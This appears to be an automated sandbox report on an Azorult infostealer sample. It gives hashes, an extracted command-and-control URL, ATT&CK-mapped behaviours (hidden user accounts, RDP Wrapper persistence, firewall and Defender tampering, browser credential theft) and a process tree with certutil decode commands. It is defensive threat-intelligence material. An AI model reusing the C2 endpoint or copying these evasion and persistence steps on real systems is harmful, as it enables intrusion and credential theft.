azorult | 760bdc9f30481b2f65721cf6f7650aa3b8a07ce1554018cf439231c420efb449

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-12-2024 18:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
Size

3.2MB
MD5

7aaa757fa6b13340fa16c6c7eebb0c0f
SHA1

3ea1381da382411231389c8be2c1117310a8efe0
SHA256

c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07
SHA512

1e372f60f5262742435ed5fddca5cf01362497b930ca614e30e3661defa74c8e2d8934926b94ae94f94c42b6d6e972afb0c3dfddb5bf7b928c4c7accc21ebe53
SSDEEP

98304:i1Eu7EywnDEADZ6dly16EOM8RvFs4j25wcMIn:i1ERNnDEAFwM16E+RvFs4j8w+n

Score

10^/10

azorult defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

azorult

http://0-800-email.com/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
2356	net.exe
2444	net1.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
45	4036	cscript.exe
47	4180	WScript.exe
56	4508	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1756	powershell.exe
3248	powershell.exe
1484	powershell.exe

Manipulates Digital Signatures 1 TTPs 3 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION"	certutil.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 6 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2504	netsh.exe
2356	netsh.exe
4108	netsh.exe
4940	netsh.exe
4896	netsh.exe
4300	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 12 IoCs

pid	Process
4976	err.exe
736	dos.com
4576	dos.com
4108	dos.com
832	dos.com
4432	dos.com
3648	dos.com
4980	RDPWInst.exe
3068	RDPWInst.exe
2040	RDPWInst.exe
4524	RDPWInst.exe
3716	RDPWInst.exe

Loads dropped DLL 3 IoCs

pid	Process
4188	svchost.exe
3076	svchost.exe
960	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Deobfuscate/Decode Files or Information 1 TTPs 3 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
1456	certutil.exe
2640	certutil.exe
2760	certutil.exe

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nnegaflmhphncebjoablmpaocnciimbj\6110\manifest.json	dos.com

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
23	raw.githubusercontent.com
44	raw.githubusercontent.com
45	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\null	cmd.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File created	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\null	cmd.exe

Hide Artifacts: Hidden Users 1 TTPs 3 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\KcyhtbVgWp = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\KcyhtbVgWp = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\KcyhtbVgWp = "0"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4108 set thread context of 832	4108	dos.com	92
PID 736 set thread context of 4432	736	dos.com	93
PID 4576 set thread context of 3648	4576	dos.com	94

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap_new.ini	cscript.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\plink.exe	dos.com
File opened for modification	C:\Program Files\RDP Wrapper	dos.com
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	dos.com
File opened for modification	C:\Program Files\RDP Wrapper\autoupdate.bat	dos.com
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	dos.com
File created	C:\Program Files\RDP Wrapper\autoupdate.bat	dos.com
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\plink.exe	dos.com

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3316	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dos.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dos.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	err.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dos.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dos.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dos.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dos.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
3720	timeout.exe
4052	timeout.exe
4964	timeout.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3332	schtasks.exe
4844	schtasks.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	45	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	47	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	56	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
4108	dos.com
4108	dos.com
736	dos.com
736	dos.com
4576	dos.com
4576	dos.com
832	dos.com
832	dos.com
1756	powershell.exe
1756	powershell.exe
4188	svchost.exe
4188	svchost.exe
4188	svchost.exe
4188	svchost.exe
3076	svchost.exe
3076	svchost.exe
3076	svchost.exe
3076	svchost.exe
960	svchost.exe
960	svchost.exe
960	svchost.exe
960	svchost.exe
3248	powershell.exe
3248	powershell.exe
1484	powershell.exe
1484	powershell.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4088	WMIC.exe
Token: SeSecurityPrivilege	4088	WMIC.exe
Token: SeTakeOwnershipPrivilege	4088	WMIC.exe
Token: SeLoadDriverPrivilege	4088	WMIC.exe
Token: SeSystemProfilePrivilege	4088	WMIC.exe
Token: SeSystemtimePrivilege	4088	WMIC.exe
Token: SeProfSingleProcessPrivilege	4088	WMIC.exe
Token: SeIncBasePriorityPrivilege	4088	WMIC.exe
Token: SeCreatePagefilePrivilege	4088	WMIC.exe
Token: SeBackupPrivilege	4088	WMIC.exe
Token: SeRestorePrivilege	4088	WMIC.exe
Token: SeShutdownPrivilege	4088	WMIC.exe
Token: SeDebugPrivilege	4088	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4088	WMIC.exe
Token: SeRemoteShutdownPrivilege	4088	WMIC.exe
Token: SeUndockPrivilege	4088	WMIC.exe
Token: SeManageVolumePrivilege	4088	WMIC.exe
Token: 33	4088	WMIC.exe
Token: 34	4088	WMIC.exe
Token: 35	4088	WMIC.exe
Token: 36	4088	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4088	WMIC.exe
Token: SeSecurityPrivilege	4088	WMIC.exe
Token: SeTakeOwnershipPrivilege	4088	WMIC.exe
Token: SeLoadDriverPrivilege	4088	WMIC.exe
Token: SeSystemProfilePrivilege	4088	WMIC.exe
Token: SeSystemtimePrivilege	4088	WMIC.exe
Token: SeProfSingleProcessPrivilege	4088	WMIC.exe
Token: SeIncBasePriorityPrivilege	4088	WMIC.exe
Token: SeCreatePagefilePrivilege	4088	WMIC.exe
Token: SeBackupPrivilege	4088	WMIC.exe
Token: SeRestorePrivilege	4088	WMIC.exe
Token: SeShutdownPrivilege	4088	WMIC.exe
Token: SeDebugPrivilege	4088	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4088	WMIC.exe
Token: SeRemoteShutdownPrivilege	4088	WMIC.exe
Token: SeUndockPrivilege	4088	WMIC.exe
Token: SeManageVolumePrivilege	4088	WMIC.exe
Token: 33	4088	WMIC.exe
Token: 34	4088	WMIC.exe
Token: 35	4088	WMIC.exe
Token: 36	4088	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2324	WMIC.exe
Token: SeSecurityPrivilege	2324	WMIC.exe
Token: SeTakeOwnershipPrivilege	2324	WMIC.exe
Token: SeLoadDriverPrivilege	2324	WMIC.exe
Token: SeSystemProfilePrivilege	2324	WMIC.exe
Token: SeSystemtimePrivilege	2324	WMIC.exe
Token: SeProfSingleProcessPrivilege	2324	WMIC.exe
Token: SeIncBasePriorityPrivilege	2324	WMIC.exe
Token: SeCreatePagefilePrivilege	2324	WMIC.exe
Token: SeBackupPrivilege	2324	WMIC.exe
Token: SeRestorePrivilege	2324	WMIC.exe
Token: SeShutdownPrivilege	2324	WMIC.exe
Token: SeDebugPrivilege	2324	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2324	WMIC.exe
Token: SeRemoteShutdownPrivilege	2324	WMIC.exe
Token: SeUndockPrivilege	2324	WMIC.exe
Token: SeManageVolumePrivilege	2324	WMIC.exe
Token: 33	2324	WMIC.exe
Token: 34	2324	WMIC.exe
Token: 35	2324	WMIC.exe
Token: 36	2324	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2324	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2924 wrote to memory of 4976	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	82
PID 2924 wrote to memory of 4976	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	82
PID 2924 wrote to memory of 4976	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	82
PID 2924 wrote to memory of 1456	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	83
PID 2924 wrote to memory of 1456	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	83
PID 2924 wrote to memory of 1456	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	83
PID 2924 wrote to memory of 2640	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	85
PID 2924 wrote to memory of 2640	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	85
PID 2924 wrote to memory of 2640	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	85
PID 2924 wrote to memory of 2760	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	87
PID 2924 wrote to memory of 2760	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	87
PID 2924 wrote to memory of 2760	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	87
PID 2924 wrote to memory of 736	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	89
PID 2924 wrote to memory of 736	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	89
PID 2924 wrote to memory of 736	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	89
PID 2924 wrote to memory of 4576	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	90
PID 2924 wrote to memory of 4576	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	90
PID 2924 wrote to memory of 4576	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	90
PID 2924 wrote to memory of 4108	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	91
PID 2924 wrote to memory of 4108	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	91
PID 2924 wrote to memory of 4108	2924	c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe	91
PID 4108 wrote to memory of 832	4108	dos.com	92
PID 4108 wrote to memory of 832	4108	dos.com	92
PID 4108 wrote to memory of 832	4108	dos.com	92
PID 736 wrote to memory of 4432	736	dos.com	93
PID 736 wrote to memory of 4432	736	dos.com	93
PID 736 wrote to memory of 4432	736	dos.com	93
PID 4108 wrote to memory of 832	4108	dos.com	92
PID 4108 wrote to memory of 832	4108	dos.com	92
PID 736 wrote to memory of 4432	736	dos.com	93
PID 736 wrote to memory of 4432	736	dos.com	93
PID 4576 wrote to memory of 3648	4576	dos.com	94
PID 4576 wrote to memory of 3648	4576	dos.com	94
PID 4576 wrote to memory of 3648	4576	dos.com	94
PID 4576 wrote to memory of 3648	4576	dos.com	94
PID 4576 wrote to memory of 3648	4576	dos.com	94
PID 3648 wrote to memory of 1504	3648	dos.com	95
PID 3648 wrote to memory of 1504	3648	dos.com	95
PID 3648 wrote to memory of 1504	3648	dos.com	95
PID 1504 wrote to memory of 2808	1504	cmd.exe	97
PID 1504 wrote to memory of 2808	1504	cmd.exe	97
PID 1504 wrote to memory of 2808	1504	cmd.exe	97
PID 3648 wrote to memory of 4236	3648	dos.com	98
PID 3648 wrote to memory of 4236	3648	dos.com	98
PID 3648 wrote to memory of 4236	3648	dos.com	98
PID 4236 wrote to memory of 4844	4236	cmd.exe	100
PID 4236 wrote to memory of 4844	4236	cmd.exe	100
PID 4236 wrote to memory of 4844	4236	cmd.exe	100
PID 3648 wrote to memory of 2632	3648	dos.com	101
PID 3648 wrote to memory of 2632	3648	dos.com	101
PID 3648 wrote to memory of 2632	3648	dos.com	101
PID 2632 wrote to memory of 1196	2632	cmd.exe	103
PID 2632 wrote to memory of 1196	2632	cmd.exe	103
PID 2632 wrote to memory of 1196	2632	cmd.exe	103
PID 3648 wrote to memory of 1576	3648	dos.com	104
PID 3648 wrote to memory of 1576	3648	dos.com	104
PID 3648 wrote to memory of 1576	3648	dos.com	104
PID 1576 wrote to memory of 3332	1576	cmd.exe	106
PID 1576 wrote to memory of 3332	1576	cmd.exe	106
PID 1576 wrote to memory of 3332	1576	cmd.exe	106
PID 3648 wrote to memory of 2740	3648	dos.com	107
PID 3648 wrote to memory of 2740	3648	dos.com	107
PID 3648 wrote to memory of 2740	3648	dos.com	107
PID 2740 wrote to memory of 3888	2740	cmd.exe	109

C:\Users\Admin\AppData\Local\Temp\c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
"C:\Users\Admin\AppData\Local\Temp\c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2924
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe
  "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4976
- C:\Windows\SysWOW64\certutil.exe
  "C:\Windows\System32\certutil.exe" -decode dera deras
  2⤵
  - Manipulates Digital Signatures
  - Deobfuscate/Decode Files or Information
  - System Location Discovery: System Language Discovery
  PID:1456
- C:\Windows\SysWOW64\certutil.exe
  "C:\Windows\System32\certutil.exe" -decode sfera sferas
  2⤵
  - Deobfuscate/Decode Files or Information
  - System Location Discovery: System Language Discovery
  PID:2640
- C:\Windows\SysWOW64\certutil.exe
  "C:\Windows\System32\certutil.exe" -decode bruto brutos
  2⤵
  - Deobfuscate/Decode Files or Information
  - System Location Discovery: System Language Discovery
  PID:2760
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
  "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" deras
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:736
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4432
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
  "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" brutos
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4576
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3648
